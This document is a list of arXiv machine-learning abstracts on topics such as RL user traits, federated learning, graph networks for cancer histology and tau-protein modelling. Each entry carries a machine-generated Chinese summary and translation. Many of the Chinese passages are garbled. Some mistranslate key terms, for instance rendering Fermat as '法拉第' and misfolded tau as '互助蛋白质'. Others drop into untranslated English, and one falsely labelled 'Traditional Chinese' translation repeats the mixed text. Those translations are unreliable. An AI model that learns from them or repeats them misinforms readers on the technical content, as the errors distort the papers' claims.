When assisting human users in reinforcement learning (RL), we can represent users as RL agents and study key parameters, called \emph{user traits}, to inform intervention design. We study the relationship between user behaviors (policy classes) and user traits. Given an environment, we introduce an intuitive tool for studying the breakdown of "user types": broad sets of traits that result in the same behavior. We show that seemingly different real-world environments admit the same set of user types and formalize this observation as an equivalence relation defined on environments. By transferring intervention design between environments within the same equivalence class, we can help rapidly personalize interventions.

摘要
Translated into Simplified Chinese:在帮助人类用户进行学习增强（RL）时，我们可以将用户表示为RL agent，并研究关键参数，即“用户特征”，以便设计干预。我们研究用户行为（策略类型）和用户特征之间的关系。给定环境，我们引入一种直观的工具来研究“用户类型”的分解：广泛的特征集合，导致同样的行为。我们发现不同的实际环境都可以拥有同一组用户类型，并将这一观察形式化为环境之间的等式关系。通过在同一等式类中传递干预设计，我们可以帮助快速个化干预。

Integer Factorisation, Fermat & Machine Learning on a Classical Computer

paper_url: http://arxiv.org/abs/2308.12290
repo_url: None
paper_authors: Sam Blake
for: 该论文提出了一种基于深度学习的整数分解算法。
methods: 该算法使用欧拉扩展的法拉第分解算法将整数分解问题转化为二分类问题，并使用大量的synthetic数据进行训练。
results: 该论文介绍了算法的实现和一些实验结果，并分析了实验的缺陷。它还呼吁其他研究人员复现、验证和改进这种方法，以确定其可scalability和实用性。

Abstract
In this paper we describe a deep learning--based probabilistic algorithm for integer factorisation. We use Lawrence's extension of Fermat's factorisation algorithm to reduce the integer factorisation problem to a binary classification problem. To address the classification problem, based on the ease of generating large pseudo--random primes, a corpus of training data, as large as needed, is synthetically generated. We will introduce the algorithm, summarise some experiments, analyse where these experiments fall short, and finally put out a call to others to reproduce, verify and see if this approach can be improved to a point where it becomes a practical, scalable factorisation algorithm.

摘要
在这篇论文中，我们描述了一种深度学习基于概率算法的整数分解方法。我们使用劳伦斯扩展的费马分解算法将整数分解问题转化为二分类问题。为解决这个分类问题，我们使用大量生成的假随机 prime 数据集进行训练。我们将算法介绍、summarize一些实验结果、分析实验的缺陷，最后呼吁其他人重现、验证以及提高这种方法，以使其成为实用、可扩展的分解算法。

Feedback is All You Need: Real-World Reinforcement Learning with Approximate Physics-Based Models

paper_url: http://arxiv.org/abs/2307.08168
repo_url: None
paper_authors: Tyler Westenbroek, Jacob Levy, David Fridovich-Keil
for: 本研究旨在开发高效可靠的政策优化策略，用于机器学习实际数据上的 робоット学习。
methods: 本研究使用政策梯度方法，并系统地利用一个可能很简单的第一原理模型，以生成有限量的实际数据上的精确控制策略。
results: 本研究通过理论分析和硬件实验，证明了这种方法可以在几分钟的实际数据上学习精确控制策略，并且可以重新使用。

Abstract
We focus on developing efficient and reliable policy optimization strategies for robot learning with real-world data. In recent years, policy gradient methods have emerged as a promising paradigm for training control policies in simulation. However, these approaches often remain too data inefficient or unreliable to train on real robotic hardware. In this paper we introduce a novel policy gradient-based policy optimization framework which systematically leverages a (possibly highly simplified) first-principles model and enables learning precise control policies with limited amounts of real-world data. Our approach $1)$ uses the derivatives of the model to produce sample-efficient estimates of the policy gradient and $2)$ uses the model to design a low-level tracking controller, which is embedded in the policy class. Theoretical analysis provides insight into how the presence of this feedback controller addresses overcomes key limitations of stand-alone policy gradient methods, while hardware experiments with a small car and quadruped demonstrate that our approach can learn precise control strategies reliably and with only minutes of real-world data.

摘要
我们主要专注于开发高效可靠的政策优化策略，以对现实世界数据进行机器学习。在最近几年中，政策势方法emerged as a promising paradigm for training control policies in simulation. However, these approaches often remain too data inefficient or unreliable to train on real robotic hardware. In this paper, we introduce a novel policy gradient-based policy optimization framework which systematically leverages a (possibly highly simplified) first-principles model and enables learning precise control policies with limited amounts of real-world data.Our approach $1)$ uses the derivatives of the model to produce sample-efficient estimates of the policy gradient and $2)$ uses the model to design a low-level tracking controller, which is embedded in the policy class. Theoretical analysis provides insight into how the presence of this feedback controller addresses overcomes key limitations of stand-alone policy gradient methods, while hardware experiments with a small car and quadruped demonstrate that our approach can learn precise control strategies reliably and with only minutes of real-world data.Here's the translation in Traditional Chinese:我们主要专注于开发高效可靠的政策优化策略，以对现实世界数据进行机器学习。在最近几年中，政策势方法emerged as a promising paradigm for training control policies in simulation. However, these approaches often remain too data inefficient or unreliable to train on real robotic hardware. In this paper, we introduce a novel policy gradient-based policy optimization framework which systematically leverages a (possibly highly simplified) first-principles model and enables learning precise control policies with limited amounts of real-world data.Our approach $1)$ uses the derivatives of the model to produce sample-efficient estimates of the policy gradient and $2)$ uses the model to design a low-level tracking controller, which is embedded in the policy class. Theoretical analysis provides insight into how the presence of this feedback controller addresses overcomes key limitations of stand-alone policy gradient methods, while hardware experiments with a small car and quadruped demonstrate that our approach can learn precise control strategies reliably and with only minutes of real-world data.

Computing the gradients with respect to all parameters of a quantum neural network using a single circuit

paper_url: http://arxiv.org/abs/2307.08167
repo_url: https://github.com/gphehub/grad2210
paper_authors: Guang Ping He
for: 计算量子神经网络的梯度时，需要计算两次Cost函数，一次是为了计算单个可调参数的梯度。当总参数数量很高时，量子电路需要调整和运行多次。
methods: 我们提出了一种方法，可以使用单个Circuit来计算所有梯度，减少Circuit的深度和классическийRegister的数量。
results: 我们实验表明，我们的方法可以在真实的量子硬件和模拟器上实现速度减少， compiling circuit takes significantly less time than conventional approach, resulting in a total runtime speedup.

Abstract
When computing the gradients of a quantum neural network using the parameter-shift rule, the cost function needs to be calculated twice for the gradient with respect to a single adjustable parameter of the network. When the total number of parameters is high, the quantum circuit for the computation has to be adjusted and run for many times. Here we propose an approach to compute all the gradients using a single circuit only, with a much reduced circuit depth and less classical registers. We also demonstrate experimentally, on both real quantum hardware and simulator, that our approach has the advantages that the circuit takes a significantly shorter time to compile than the conventional approach, resulting in a speedup on the total runtime.

摘要
当计算量子神经网络中参数的梯度使用参数变化规则时，需要计算两次函数值以计算单个可变参数的梯度。当总参数数量较高时，量子电路需要调整并运行多次。我们提出了一种方法，可以通过单个电路计算所有梯度，减少电路深度和классический寄存器数量。我们还在实际中进行了实验，在真实的量子硬件和模拟器上证明了我们的方法可以减少电路编译时间，从而提高总时间的速度。Note: The word "quantum" is translated as "量子" in Simplified Chinese.

Neural Stream Functions

paper_url: http://arxiv.org/abs/2307.08142
repo_url: https://github.com/skywolf829/neuralstreamfunction
paper_authors: Skylar Wolfgang Wurster, Hanqi Guo, Tom Peterka, Han-Wei Shen
for: 这个论文是为了计算流函数的 neural network 方法，流函数是一种可以描述流体动态的scalar函数，其梯度与给定的vector field正交。
methods: 该论文使用了一种 implicit neural network 方法，将输入vector field作为输入，并使用内积loss函数来学习一个流函数。该网络可以将输入坐标映射到流函数值上，并且可以通过梯度内积来保证梯度的正交性。
results: 该论文的结果表明，使用这种方法可以生成高质量的流函数解，并且可以根据不同的regularizing loss函数来生成流函数解的不同版本。另外，论文还提供了一些关于如何正确visualize和提取artefact-free的流函数解的建议。

Abstract
We present a neural network approach to compute stream functions, which are scalar functions with gradients orthogonal to a given vector field. As a result, isosurfaces of the stream function extract stream surfaces, which can be visualized to analyze flow features. Our approach takes a vector field as input and trains an implicit neural representation to learn a stream function for that vector field. The network learns to map input coordinates to a stream function value by minimizing the inner product of the gradient of the neural network's output and the vector field. Since stream function solutions may not be unique, we give optional constraints for the network to learn particular stream functions of interest. Specifically, we introduce regularizing loss functions that can optionally be used to generate stream function solutions whose stream surfaces follow the flow field's curvature, or that can learn a stream function that includes a stream surface passing through a seeding rake. We also discuss considerations for properly visualizing the trained implicit network and extracting artifact-free surfaces. We compare our results with other implicit solutions and present qualitative and quantitative results for several synthetic and simulated vector fields.

摘要
我们提出了一种神经网络方法来计算流函数，这些函数的梯度与给定的vector场垂直。因此，iso面流函数提取流面，可以用于分析流体特征。我们的方法通过输入vector场来训练一个隐式神经表示，以学习一个流函数。神经网络将输入坐标映射到流函数值上，通过神经网络输出的梯度和vector场的内积来进行折叠。由于流函数解可能不唯一，我们可以选择ally加入regularizing loss函数，以学习特定的流函数解。例如，我们可以添加一个束制约损失函数，使流函数解的流面与流体场的弯曲性相符，或者学习一个流函数解，其中流面通过种子托铁 passing through。我们还讨论了对训练完成后的隐式神经表示进行正确的visual化和提取 artifact-free的流面。我们与其他隐式解相比较，并对一些synthetic和simulated vector fields进行了质量和量化的结果。

DynamicFL: Balancing Communication Dynamics and Client Manipulation for Federated Learning

paper_url: http://arxiv.org/abs/2308.06267
repo_url: None
paper_authors: Bocheng Chen, Nikolay Ivanov, Guangjing Wang, Qiben Yan
for: 这篇论文的目的是提出一个新的联合学习（Federated Learning，FL）框架，以解决联合学习中的高系统多样性问题。
methods: 这篇论文使用了一个特殊的客户端操作策略，将客户端选择基于其网络预测和训练数据质量。此外，它还使用了一个长期追攻策略来解决网络动态环境中的性能下降问题。
results: 相比于现有的客户端选择方案，这篇论文的方法可以实现更好的模型准确性，并且只需要18.9%-84.0%的墙时钟时间。此外，论文还进行了分成和敏感性研究，以证明其在实际应用中的稳定性和可靠性。

Abstract
Federated Learning (FL) is a distributed machine learning (ML) paradigm, aiming to train a global model by exploiting the decentralized data across millions of edge devices. Compared with centralized learning, FL preserves the clients' privacy by refraining from explicitly downloading their data. However, given the geo-distributed edge devices (e.g., mobile, car, train, or subway) with highly dynamic networks in the wild, aggregating all the model updates from those participating devices will result in inevitable long-tail delays in FL. This will significantly degrade the efficiency of the training process. To resolve the high system heterogeneity in time-sensitive FL scenarios, we propose a novel FL framework, DynamicFL, by considering the communication dynamics and data quality across massive edge devices with a specially designed client manipulation strategy. \ours actively selects clients for model updating based on the network prediction from its dynamic network conditions and the quality of its training data. Additionally, our long-term greedy strategy in client selection tackles the problem of system performance degradation caused by short-term scheduling in a dynamic network. Lastly, to balance the trade-off between client performance evaluation and client manipulation granularity, we dynamically adjust the length of the observation window in the training process to optimize the long-term system efficiency. Compared with the state-of-the-art client selection scheme in FL, \ours can achieve a better model accuracy while consuming only 18.9\% -- 84.0\% of the wall-clock time. Our component-wise and sensitivity studies further demonstrate the robustness of \ours under various real-life scenarios.

摘要
联合学习（FL）是一种分布式机器学习（ML）模式，旨在透过分散在数百万副本设备（例如移动设备、车辆、火车、或地铁）上的分散数据，训练全球模型。相比中央学习，FL 保持客户端隐私，不直接下载客户端数据。然而，在野外的分散式边缘设备上，因为高度动态的网络环境，聚合所有模型更新从参与设备会带来不可预测的长尾延迟。这将严重损害训练过程的效率。为解决高度系统多样性的时间敏感FL情况下，我们提出了一个新的FL框架，即动态FL，通过考虑网络预测和训练数据质量，对于大量边缘设备进行特殊设计的客户端操作策略。我们在选择客户端进行模型更新时，会根据其网络条件预测和训练数据质量进行选择。此外，我们还使用了长期追击策略，以解决因为短期调度而导致的系统性能下降。最后，为寻求训练过程中的平衡，我们在训练过程中动态调整观察窗口的长度，以便最佳化系统效率。相比之前的客户端选择方案，我们的方案可以获得更好的模型精度，并且只需消耗18.9%-84.0%的壁网时间。我们的组件实验和敏感性研究显示了我们的方案在实际情况下的可持续性。

Heterogeneous graphs model spatial relationships between biological entities for breast cancer diagnosis

paper_url: http://arxiv.org/abs/2307.08132
repo_url: None
paper_authors: Akhila Krishna K, Ravi Kant Gupta, Nikhil Cherian Kurian, Pranav Jeevan, Amit Sethi
for: 这篇论文旨在提高乳癌早期检测、诊断和治疗选择的准确性，挑战乳癌病例的多样性。
methods: 这篇论文使用graph neural network（GNN）来捕捉乳癌病例中细胞和组织之间的空间关系，并将细胞和组织转换为网络结构，以提高对乳癌病例的检测和诊断。
results: 这篇论文的模型在三个公开可用的乳癌数据集上（BRIGHT、BreakHis和BACH）上显示出超过比较器-基于的现有方法的高准确性，并且显示出较低的参数数量和训练时间。

Abstract
The heterogeneity of breast cancer presents considerable challenges for its early detection, prognosis, and treatment selection. Convolutional neural networks often neglect the spatial relationships within histopathological images, which can limit their accuracy. Graph neural networks (GNNs) offer a promising solution by coding the spatial relationships within images. Prior studies have investigated the modeling of histopathological images as cell and tissue graphs, but they have not fully tapped into the potential of extracting interrelationships between these biological entities. In this paper, we present a novel approach using a heterogeneous GNN that captures the spatial and hierarchical relations between cell and tissue graphs to enhance the extraction of useful information from histopathological images. We also compare the performance of a cross-attention-based network and a transformer architecture for modeling the intricate relationships within tissue and cell graphs. Our model demonstrates superior efficiency in terms of parameter count and achieves higher accuracy compared to the transformer-based state-of-the-art approach on three publicly available breast cancer datasets -- BRIGHT, BreakHis, and BACH.

摘要
breast cancer 的多样性呈现出较大的检测早期、诊断和治疗选择的挑战。 convolutional neural networks 经常忽略图像中的空间关系，这可能会限制其精度。 graph neural networks （GNNs）提供了一个有前途的解决方案，通过编码图像中的空间关系。先前的研究已经研究了模型 histopathological 图像为细胞和组织图像，但它们没有充分利用了提取这些生物体系间的关系的潜在。在本文中，我们提出了一种新的方法，使用多样性 GNN 捕捉图像中的空间和层次关系，以提高对 histopathological 图像的EXTRACT 有用信息。我们还对 cross-attention 网络和 transformer 架构进行比较，以模型图像中的复杂关系。我们的模型在三个公共可用的 breast cancer 数据集（BRIGHT、BreakHis 和 BACH）上达到了更高的准确率，并且在参数计数方面表现出了更高的效率，比较 transformer 基于 state-of-the-art 方法。

INFLECT-DGNN: Influencer Prediction with Dynamic Graph Neural Networks

paper_url: http://arxiv.org/abs/2307.08131
repo_url: https://github.com/banking-analytics-lab/inflect
paper_authors: Elena Tiukhova, Emiliano Penaloza, María Óskarsdóttir, Bart Baesens, Monique Snoeck, Cristián Bravo
for: 本研究旨在透过 integrate 动态图 neural network 和 recurrent neural network 等技术，提高 influencer 预测的准确性。
methods: 本研究提出了一种新的 INFLECT-DGNN 框架， combining 图 neural network 和 recurrent neural network ，并使用 weighted loss functions、Synthetic Minority Oversampling TEchnique (SMOTE) 和 rolling-window strategy。
results: 研究结果表明，使用 RNN 编码时间特征并与 GNN 结合使用，能够显著提高 influencer 预测的准确性。 compare various models， demonstrate capture 图表示、时间依赖和使用财务驱动方法评价的重要性。

Abstract
Leveraging network information for predictive modeling has become widespread in many domains. Within the realm of referral and targeted marketing, influencer detection stands out as an area that could greatly benefit from the incorporation of dynamic network representation due to the ongoing development of customer-brand relationships. To elaborate this idea, we introduce INFLECT-DGNN, a new framework for INFLuencer prEdiCTion with Dynamic Graph Neural Networks that combines Graph Neural Networks (GNN) and Recurrent Neural Networks (RNN) with weighted loss functions, the Synthetic Minority Oversampling TEchnique (SMOTE) adapted for graph data, and a carefully crafted rolling-window strategy. To evaluate predictive performance, we utilize a unique corporate data set with networks of three cities and derive a profit-driven evaluation methodology for influencer prediction. Our results show how using RNN to encode temporal attributes alongside GNNs significantly improves predictive performance. We compare the results of various models to demonstrate the importance of capturing graph representation, temporal dependencies, and using a profit-driven methodology for evaluation.

摘要
利用网络信息进行预测模型已经在多个领域广泛应用。在推荐和目标营销领域中，Influencer detection stands out as an area that could greatly benefit from the incorporation of dynamic network representation due to the ongoing development of customer-brand relationships。为了开发这个想法，我们介绍了 INFLECT-DGNN，一个新的框架 для INFLuencer prEdiCTion with Dynamic Graph Neural Networks，该框架结合图 neural network (GNN) 和回归神经网络 (RNN)，并使用负权重函数、Synthetic Minority Oversampling TEchnique (SMOTE) adapted for graph data，以及一种精心制定的滚动窗口策略。为了评估预测性能，我们使用了一个独特的企业数据集，并 derivated a profit-driven evaluation methodology for influencer prediction。我们的结果表明，使用 RNN 来编码时间特征 alongside GNNs 可以显著提高预测性能。我们对各种模型进行比较，以示出捕捉图表示、时间依赖和使用财务驱动的评估方法的重要性。

Tangent Transformers for Composition, Privacy and Removal

paper_url: http://arxiv.org/abs/2307.08122
repo_url: None
paper_authors: Tian Yu Liu, Aditya Golatkar, Stefano Soatto
for: 这篇论文是为了提出一种名为 Tangent Attention Fine-Tuning (TAFT) 的方法，用于精度调整 linearized transformers。
methods: 这种方法使用计算 First-order Taylor Expansion 的方式来计算 Jacobian-Vector Product，从而在单个前进 pass 中计算训练和推理成本，与原始非线性网络相同的数目参数。
results: 当应用于不同的视觉分类任务时，使用 TAFT 精度调整 Tangent Transformer 可以与原始非线性网络精度调整相比肩，而且在同样的参数数量下。此外，TAFT 具有许多优点，例如模型组合、并行训练、机器忘却和差分隐私等。

Abstract
We introduce Tangent Attention Fine-Tuning (TAFT), a method for fine-tuning linearized transformers obtained by computing a First-order Taylor Expansion around a pre-trained initialization. We show that the Jacobian-Vector Product resulting from linearization can be computed efficiently in a single forward pass, reducing training and inference cost to the same order of magnitude as its original non-linear counterpart, while using the same number of parameters. Furthermore, we show that, when applied to various downstream visual classification tasks, the resulting Tangent Transformer fine-tuned with TAFT can perform comparably with fine-tuning the original non-linear network. Since Tangent Transformers are linear with respect to the new set of weights, and the resulting fine-tuning loss is convex, we show that TAFT enjoys several advantages compared to non-linear fine-tuning when it comes to model composition, parallel training, machine unlearning, and differential privacy.

摘要
我们介绍 Tangent Attention Fine-Tuning（TAFT），一种精简 Linearized Transformers 的方法，通过计算首项泰利扩展来初始化预训练。我们证明了 Jacobian-Vector Product 的计算可以在单一前进中进行高效地进行，因此训练和测试成本与原始非线性网络相同的阶层，同时使用相同的参数数量。此外，我们显示了在不同的下游视觉分类任务中，使用 TAFT 精简 Tangent Transformer 的 fine-tuning 可以与原始非线性网络的 fine-tuning 相比。因为 Tangent Transformers 是对新的参数集线性的，并且 fine-tuning 的损失函数是凸函数，我们显示了 TAFT 在模型结构、平行训练、机器学习推广和数据隐私方面具有多个优点。

Domain Generalisation with Bidirectional Encoder Representations from Vision Transformers

paper_url: http://arxiv.org/abs/2307.08117
repo_url: https://github.com/sw-packages/d23c4b6afa05094a23071333bd230aceceec08117355003f5c0ea958e60c9c98
paper_authors: Hamza Riaz, Alan F. Smeaton
for: 这篇论文主要针对domain generalization问题，即将知识从源领域传递到未见领域，以实现深度学习模型的通用化。
methods: 本论文使用了vision transformer（ViT）、LeViT、DeiT和BEIT四种架构进行领域通用化，并在out-of-distribution（OOD）数据上进行初步评估。最终选择了BEIT架构进行进一步的实验。
results: 本论文的结果显示，使用BEIT架构进行领域通用化可以获得显著的提升，具体来说是在PACS、Home-Office和DomainNet三个benchmark上有着优秀的验证和测试准确率表现。此外，本论文的实现也能够填补在 Within-distribution和OOD数据之间的差距。

Abstract
Domain generalisation involves pooling knowledge from source domain(s) into a single model that can generalise to unseen target domain(s). Recent research in domain generalisation has faced challenges when using deep learning models as they interact with data distributions which differ from those they are trained on. Here we perform domain generalisation on out-of-distribution (OOD) vision benchmarks using vision transformers. Initially we examine four vision transformer architectures namely ViT, LeViT, DeiT, and BEIT on out-of-distribution data. As the bidirectional encoder representation from image transformers (BEIT) architecture performs best, we use it in further experiments on three benchmarks PACS, Home-Office and DomainNet. Our results show significant improvements in validation and test accuracy and our implementation significantly overcomes gaps between within-distribution and OOD data.

摘要
域名总结是将多个源域的知识汇集到一个可以总结到未看到的目标域的模型中。近期在域名总结中使用深度学习模型时，面临了与训练数据分布不同的数据分布相互作用的挑战。我们在out-of-distribution（OOD）视觉审核中进行域名总结，初步分析了四种视觉变换器架构，即ViT、LeViT、DeiT和BEIT。其中， bidirectional encoder representation from image transformers（BEIT）架构表现最佳，因此我们在三个审核标准 benchmark（PACS、Home-Office和DomainNet）上进行了进一步的实验。我们的结果表明，使用BEIT架构可以在验证和测试精度上实现显著改进，并且我们的实现可以弥补在 dentro-distribution和OOD数据之间的差距。

Tangent Model Composition for Ensembling and Continual Fine-tuning

paper_url: http://arxiv.org/abs/2307.08114
repo_url: None
paper_authors: Tian Yu Liu, Stefano Soatto
for: 这种方法用于组合独立地练习过的模型，以实现逐步学习、集成、或忘记学习。
methods: 这种方法使用 Tangent Model Composition (TMC) 方法，该方法可以在推理时将组件模型相加、缩放或减去，以支持逐步学习、集成、或忘记学习。
results: TMC 方法可以提高精度，比采用非线性练习模型的集成方法高出4.2%，并且在推理成本的2.5倍至10倍的减少下，推理成本与单个模型相同。此外，TMC 方法可以免除额外成本，并且不会留下任何残留效应。

Abstract
Tangent Model Composition (TMC) is a method to combine component models independently fine-tuned around a pre-trained point. Component models are tangent vectors to the pre-trained model that can be added, scaled, or subtracted to support incremental learning, ensembling, or unlearning. Component models are composed at inference time via scalar combination, reducing the cost of ensembling to that of a single model. TMC improves accuracy by 4.2% compared to ensembling non-linearly fine-tuned models at a 2.5x to 10x reduction of inference cost, growing linearly with the number of component models. Each component model can be forgotten at zero cost, with no residual effect on the resulting inference. When used for continual fine-tuning, TMC is not constrained by sequential bias and can be executed in parallel on federated data. TMC outperforms recently published continual fine-tuning methods almost uniformly on each setting -- task-incremental, class-incremental, and data-incremental -- on a total of 13 experiments across 3 benchmark datasets, despite not using any replay buffer. TMC is designed for composing models that are local to a pre-trained embedding, but could be extended to more general settings.

摘要
tangent模型组合（TMC）是一种方法，可以独立地微调component模型，然后在预训练点上组合。component模型是预训练模型的 tangent вектор，可以加、乘、减以支持逐步学习、集成或忘记学习。在推理时，component模型通过scalar组合来实现，因此推理成本只是一个模型的成本。TMC提高了精度4.2%，相比 Ensemble非线性微调模型，并且在推理成本的2.5倍至10倍之间减少了1.5倍。每个component模型可以忘记于零成本，无残留效果。在用于 continual fine-tuning 时，TMC不受顺序偏见的限制，可以在 federated data 上并行执行。TMC在任务逐步、类逐步和数据逐步的13个实验中，对 reciprocal fine-tuning 方法 almost uniformly 的性能优于其他方法，即使不使用 replay buffer。TMC是针对本地预训练 embedding 的模型组合方法，可以扩展到更广泛的设置。

Discovering a reaction-diffusion model for Alzheimer’s disease by combining PINNs with symbolic regression

paper_url: http://arxiv.org/abs/2307.08107
repo_url: None
paper_authors: Zhen Zhang, Zongren Zou, Ellen Kuhl, George Em Karniadakis
for: 这些研究旨在描述阿尔ツ海默病的发展和病理过程中，蛋白质tau的折叠错误的角色。
methods: 这些研究使用深度学习和人工智能技术，以发现阿尔ツ海默病的数学模型。具体来说，他们使用物理学 Informed Neural Networks (PINNs) 和符号回归来发现tau蛋白质折叠错误的征化方程。
results: 这些研究发现，在46名可能发展阿尔ツ海默病的个体和30名健康控制群体的tau蛋白质扫描数据上，使用PINNs和符号回归可以发现不同的折叠模型，而且阿尔ツ海默病群体的折叠模型比健康控制群体快。这些结果表明，PINNs 和符号回归可以用于发现阿尔ツ海默病中tau蛋白质折叠错误的数学模型。

Abstract
Misfolded tau proteins play a critical role in the progression and pathology of Alzheimer's disease. Recent studies suggest that the spatio-temporal pattern of misfolded tau follows a reaction-diffusion type equation. However, the precise mathematical model and parameters that characterize the progression of misfolded protein across the brain remain incompletely understood. Here, we use deep learning and artificial intelligence to discover a mathematical model for the progression of Alzheimer's disease using longitudinal tau positron emission tomography from the Alzheimer's Disease Neuroimaging Initiative database. Specifically, we integrate physics informed neural networks (PINNs) and symbolic regression to discover a reaction-diffusion type partial differential equation for tau protein misfolding and spreading. First, we demonstrate the potential of our model and parameter discovery on synthetic data. Then, we apply our method to discover the best model and parameters to explain tau imaging data from 46 individuals who are likely to develop Alzheimer's disease and 30 healthy controls. Our symbolic regression discovers different misfolding models $f(c)$ for two groups, with a faster misfolding for the Alzheimer's group, $f(c) = 0.23c^3 - 1.34c^2 + 1.11c$, than for the healthy control group, $f(c) = -c^3 +0.62c^2 + 0.39c$. Our results suggest that PINNs, supplemented by symbolic regression, can discover a reaction-diffusion type model to explain misfolded tau protein concentrations in Alzheimer's disease. We expect our study to be the starting point for a more holistic analysis to provide image-based technologies for early diagnosis, and ideally early treatment of neurodegeneration in Alzheimer's disease and possibly other misfolding-protein based neurodegenerative disorders.

摘要
互助蛋白质在阿尔茨海默病的发展和病理中扮演了关键角色。最新的研究表明，蛋白质的折叠发生 follows a reaction-diffusion type equation的特征。然而，正确的数学模型和参数，用于描述蛋白质的发展过程，仍然未得到完全理解。在这里，我们使用深度学习和人工智能，以发现阿尔茨海默病的数学模型。特别是，我们将物理学习神经网络（PINNs）和符号回归相结合，以找到蛋白质折叠的液态方程。首先，我们在 sintetic data 上验证了我们的模型和参数的潜力。然后，我们将我们的方法应用于46名可能发展阿尔茨海默病的个体和30名健康控制组的tau imaging数据中，以发现最佳的模型和参数，以解释蛋白质的折叠。我们的符号回归发现了两个组的不同的折叠模型，即 $f(c) = 0.23c^3 - 1.34c^2 + 1.11c$ 和 $f(c) = -c^3 + 0.62c^2 + 0.39c$。我们的结果表明，PINNs，补充符号回归，可以发现阿尔茨海默病中蛋白质折叠的液态方程。我们预计我们的研究将成为蛋白质折叠技术的开端，以提供早期诊断和治疗阿尔茨海默病和其他折叠蛋白质基因性神经退化疾病的技术。

Using Decision Trees for Interpretable Supervised Clustering

paper_url: http://arxiv.org/abs/2307.08104
repo_url: https://github.com/sayantann11/all-classification-templetes-for-ML
paper_authors: Natallia Kokash, Leonid Makhnist
for: 本研究探讨了对标注数据集中的分类数据进行可解释的分群问题，即interpretable supervised clustering。
methods: 本文提出了一种迭代方法，使用基于决策树的分类器作为最直观的学习方法，并讨论了节点选择方法以提高分群质量。
results: 本文获得了高密度分群，并通过描述分群的规则集来描述分群。

Abstract
In this paper, we address an issue of finding explainable clusters of class-uniform data in labelled datasets. The issue falls into the domain of interpretable supervised clustering. Unlike traditional clustering, supervised clustering aims at forming clusters of labelled data with high probability densities. We are particularly interested in finding clusters of data of a given class and describing the clusters with the set of comprehensive rules. We propose an iterative method to extract high-density clusters with the help of decisiontree-based classifiers as the most intuitive learning method, and discuss the method of node selection to maximize quality of identified groups.

摘要
在本文中，我们讨论了一个标签数据集中找到可解释的封闭集的问题。这个问题属于可解释supervised clustering的领域。不同于传统封闭，supervised clustering寻求高概率密度的封闭，以便更好地描述数据。我们特别关注找到某个类型的数据的封闭，并使用设计树基于分类器来描述封闭。我们提出了一种迭代方法，使用决策树基于分类器来提取高密度封闭，并讨论了选择节点以提高寻索到的集的质量。Note: Please note that the translation is in Simplified Chinese, which is the standard form of Chinese used in mainland China and Singapore. If you need Traditional Chinese, please let me know.

A max-affine spline approximation of neural networks using the Legendre transform of a convex-concave representation

paper_url: http://arxiv.org/abs/2307.09602
repo_url: https://github.com/adamgoodtime/legendre_net
paper_authors: Adam Perrett, Danny Wood, Gavin Brown
for: 该 paper 的目的是提出一种将神经网络转换为spline表示的算法。
methods: 该算法不需要 convex 和 piecewise-affine 网络操作符，而是关注函数的 bounded-ness 和 second derivative 的定义性。
results: 该算法可以在整个网络中进行，而不仅仅是在每层独立进行。这种方法可以 bridge 神经网络和近似理论之间，同时允许抽象网络特征图。实验证明了该算法的正确性和效果。

Abstract
This work presents a novel algorithm for transforming a neural network into a spline representation. Unlike previous work that required convex and piecewise-affine network operators to create a max-affine spline alternate form, this work relaxes this constraint. The only constraint is that the function be bounded and possess a well-define second derivative, although this was shown experimentally to not be strictly necessary. It can also be performed over the whole network rather than on each layer independently. As in previous work, this bridges the gap between neural networks and approximation theory but also enables the visualisation of network feature maps. Mathematical proof and experimental investigation of the technique is performed with approximation error and feature maps being extracted from a range of architectures, including convolutional neural networks.

摘要
这个研究提出了一种新的算法，用于将神经网络转换成spline表示形式。与前一些研究不同，这个算法不需要几何和分割的网络运算符来创建一个最大 afine spline alternate form。它只需要函数是有界的，且具有定义的二阶导数，尽管实验表明这并不是必要的。此外，这个算法还可以在整个网络上进行，而不仅是每层独立进行。与以前的研究相似，这种技术将神经网络与近似理论相连接，同时允许网络特征地图的可视化。这个研究包括数学证明和实验调查，并从多种架构，包括卷积神经网络中提取了近似误差和特征地图。

EasyTPP: Towards Open Benchmarking the Temporal Point Processes

paper_url: http://arxiv.org/abs/2307.08097
repo_url: https://github.com/ant-research/easytemporalpointprocess
paper_authors: Siqiao Xue, Xiaoming Shi, Zhixuan Chu, Yan Wang, Fan Zhou, Hongyan Hao, Caigao Jiang, Chen Pan, Yi Xu, James Y. Zhang, Qingsong Wen, Jun Zhou, Hongyuan Mei
for: This paper is written to establish a central benchmark for evaluating temporal point processes (TPPs) in order to promote reproducible research and accelerate progress in the field.
methods: The paper uses eight highly cited neural TPPs and integrates commonly used evaluation metrics and datasets into a standardized benchmarking pipeline. The benchmark is implemented in a universal framework that supports multiple machine learning libraries and custom implementations.
results: The paper presents a comprehensive implementation of TPPs and a standardized benchmarking pipeline for comparing different methods on different datasets, which can help promote reproducible research and accelerate progress in the field. The benchmark is open-sourced and available at a Github repository.

Abstract
Continuous-time event sequences play a vital role in real-world domains such as healthcare, finance, online shopping, social networks, and so on. To model such data, temporal point processes (TPPs) have emerged as the most advanced generative models, making a significant impact in both academic and application communities. Despite the emergence of many powerful models in recent years, there is still no comprehensive benchmark to evaluate them. This lack of standardization impedes researchers and practitioners from comparing methods and reproducing results, potentially slowing down progress in this field. In this paper, we present EasyTPP, which aims to establish a central benchmark for evaluating TPPs. Compared to previous work that also contributed datasets, our EasyTPP has three unique contributions to the community: (i) a comprehensive implementation of eight highly cited neural TPPs with the integration of commonly used evaluation metrics and datasets; (ii) a standardized benchmarking pipeline for a transparent and thorough comparison of different methods on different datasets; (iii) a universal framework supporting multiple ML libraries (e.g., PyTorch and TensorFlow) as well as custom implementations. Our benchmark is open-sourced: all the data and implementation can be found at this \href{https://github.com/ant-research/EasyTemporalPointProcess}{\textcolor{blue}{Github repository}\footnote{\url{https://github.com/ant-research/EasyTemporalPointProcess}.}. We will actively maintain this benchmark and welcome contributions from other researchers and practitioners. Our benchmark will help promote reproducible research in this field, thus accelerating research progress as well as making more significant real-world impacts.

摘要
